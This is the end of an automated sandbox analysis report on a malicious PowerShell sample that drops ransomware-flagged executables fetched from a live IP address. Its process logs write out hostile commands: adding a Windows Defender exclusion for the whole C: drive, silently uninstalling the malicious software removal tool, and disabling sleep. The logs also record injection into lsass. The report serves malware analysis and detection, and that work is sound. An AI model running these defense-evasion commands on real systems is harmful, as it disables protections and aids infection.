        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 17C7A020000
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 17C7AAB0000
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1FB0ED50000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\LB311.exe "C:\Users\user\AppData\Roaming\LB311.exe" Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\Windows\System32\dialer.exeCode function: 28_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,28_2_0000000140001B54
        Source: C:\Windows\System32\dialer.exeCode function: 28_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,28_2_0000000140001B54
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E9917336F0 cpuid 35_2_000002E9917336F0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\dialer.exeCode function: 28_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,28_2_0000000140001B54
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991757960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,35_2_000002E991757960

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Modifies power options to not sleep / hibernate
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		1
        Disable or Modify Tools        		1
        Credential API Hooking        		1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Data Obfuscation        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Native API        		1
        Windows Service        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		LSASS Memory3
        File and Directory Discovery        		Remote Desktop Protocol1
        Credential API Hooking        		11
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Command and Scripting Interpreter        		Logon Script (Windows)1
        Access Token Manipulation        		11
        Obfuscated Files or Information        		Security Account Manager123
        System Information Discovery        		SMB/Windows Admin SharesData from Network Shared Drive1
        Encrypted Channel        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        Service Execution        		Login Hook1
        Windows Service        		1
        Software Packing        		NTDS551
        Security Software Discovery        		Distributed Component Object ModelInput Capture1
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud Accounts1
        PowerShell        		Network Logon Script712
        Process Injection        		1
        DLL Side-Loading        		LSA Secrets1
        Process Discovery        		SSHKeylogging11
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
        Rootkit        		Cached Domain Credentials141
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Masquerading        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
        Virtualization/Sandbox Evasion        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Access Token Manipulation        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron712
        Process Injection        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
        Hidden Files and Directories        		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1577476 Sample: GO.png.ps1 Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 63 Antivirus detection for URL or domain 2->63 65 Multi AV Scanner detection for submitted file 2->65 67 Yara detected Powershell download and execute 2->67 69 11 other signatures 2->69 10 powershell.exe 14 21 2->10         started        15 Mig.exe 2->15         started        process3 dnsIp4 61 176.113.115.178, 49707, 80 SELECTELRU Russian Federation 10->61 59 C:\Users\user\AppData\Roaming\LB311.exe, PE32+ 10->59 dropped 93 Adds a directory exclusion to Windows Defender 10->93 95 Powershell drops PE file 10->95 17 LB311.exe 1 2 10->17         started        21 powershell.exe 23 10->21         started        23 conhost.exe 10->23         started        97 Multi AV Scanner detection for dropped file 15->97 99 Detected unpacking (changes PE section rights) 15->99 101 Tries to detect sandboxes and other dynamic analysis tools (window names) 15->101 103 4 other signatures 15->103 file5 signatures6 process7 file8 57 C:\ProgramData\Mig\Mig.exe, PE32+ 17->57 dropped 71 Multi AV Scanner detection for dropped file 17->71 73 Detected unpacking (changes PE section rights) 17->73 75 Machine Learning detection for dropped file 17->75 79 7 other signatures 17->79 25 dialer.exe 17->25         started        28 powershell.exe 23 17->28         started        30 cmd.exe 1 17->30         started        32 13 other processes 17->32 77 Loading BitLocker PowerShell Module 21->77 signatures9 process10 signatures11 83 Injects code into the Windows Explorer (explorer.exe) 25->83 85 Contains functionality to inject code into remote processes 25->85 87 Writes to foreign memory regions 25->87 91 4 other signatures 25->91 34 lsass.exe 25->34 injected 49 18 other processes 25->49 89 Loading BitLocker PowerShell Module 28->89 37 conhost.exe 28->37         started        39 conhost.exe 30->39         started        41 wusa.exe 30->41         started        43 conhost.exe 32->43         started        45 conhost.exe 32->45         started        47 conhost.exe 32->47         started        51 10 other processes 32->51 process12 signatures13 81 Writes to foreign memory regions 34->81 53 MpCmdRun.exe 34->53         started        process14 process15 55 conhost.exe 53->55         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        GO.png.ps118%ReversingLabsScript-BAT.Exploit.Minerva

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\LB311.exe100%Joe Sandbox ML
        C:\ProgramData\Mig\Mig.exe100%Joe Sandbox ML
        C:\ProgramData\Mig\Mig.exe63%ReversingLabsWin32.Ransomware.Generic
        C:\Users\user\AppData\Roaming\LB311.exe63%ReversingLabsWin32.Ransomware.Generic

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://176.113.115.1780%Avira URL Cloudsafe
        http://176.113.115.178/M.png100%Avira URL Cloudmalware

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://176.113.115.178/M.pngtrue
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1889544505.0000023D2D035000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1889544505.0000023D2CEF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1821213500.0000023D1E894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1600788987.0000021C18E13000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1579286681.0000021C08FC8000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1579286681.0000021C08FC8000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1579286681.0000021C08FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://go.micropowershell.exe, 00000000.00000002.1821213500.0000023D1DAB3000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1579286681.0000021C08FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/powershell.exe, 00000003.00000002.1600788987.0000021C18E13000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1889544505.0000023D2D035000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1889544505.0000023D2CEF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1821213500.0000023D1E894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1600788987.0000021C18E13000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000003.00000002.1600788987.0000021C18E13000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://crl.micpowershell.exe, 00000003.00000002.1606518311.0000021C213A9000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Iconpowershell.exe, 00000003.00000002.1600788987.0000021C18E13000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.1821213500.0000023D1CE81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1579286681.0000021C08DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://176.113.115.178powershell.exe, 00000000.00000002.1821213500.0000023D1E88C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1821213500.0000023D1E7D8000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1821213500.0000023D1CE81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1579286681.0000021C08DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1579286681.0000021C08FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    176.113.115.178
                                    		unknownRussian Federation
                                    		49505SELECTELRUfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1577476
                                    Start date and time:2024-12-18 14:06:09 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 11m 45s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:42
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:19
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:GO.png.ps1
                                    Detection:MAL
                                    Classification:mal100.spyw.evad.winPS1@58/76@0/1
                                    EGA Information:
                                    • Successful, ratio: 60%
                                    HCA Information:
                                    • Successful, ratio: 56%
                                    • Number of executed functions: 54
                                    • Number of non-executed functions: 256
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, WmiPrvSE.exe
                                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 5328 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 7156 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: GO.png.ps1

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    08:07:20API Interceptor76x Sleep call for process: powershell.exe modified
                                    08:07:52API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                    08:08:23API Interceptor335479x Sleep call for process: winlogon.exe modified
                                    08:08:24API Interceptor1886x Sleep call for process: dialer.exe modified
                                    08:08:25API Interceptor269716x Sleep call for process: lsass.exe modified
                                    08:08:25API Interceptor7355x Sleep call for process: svchost.exe modified
                                    08:08:28API Interceptor301906x Sleep call for process: dwm.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    176.113.115.178file.exeGet hashmaliciousUnknownBrowse
                                    • 176.113.115.178/FF/M.png
                                    file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                    • 176.113.115.178/M.png
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 176.113.115.178/FF/M.png

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    SELECTELRUfile.exeGet hashmaliciousUnknownBrowse
                                    • 176.113.115.178
                                    InstallSetup.exeGet hashmaliciousLummaCBrowse
                                    • 176.113.115.19
                                    hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                    • 176.113.115.19
                                    DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                    • 176.113.115.19
                                    he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                    • 176.113.115.19
                                    wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                    • 176.113.115.19
                                    AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                    • 176.113.115.19
                                    file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                    • 176.113.115.178
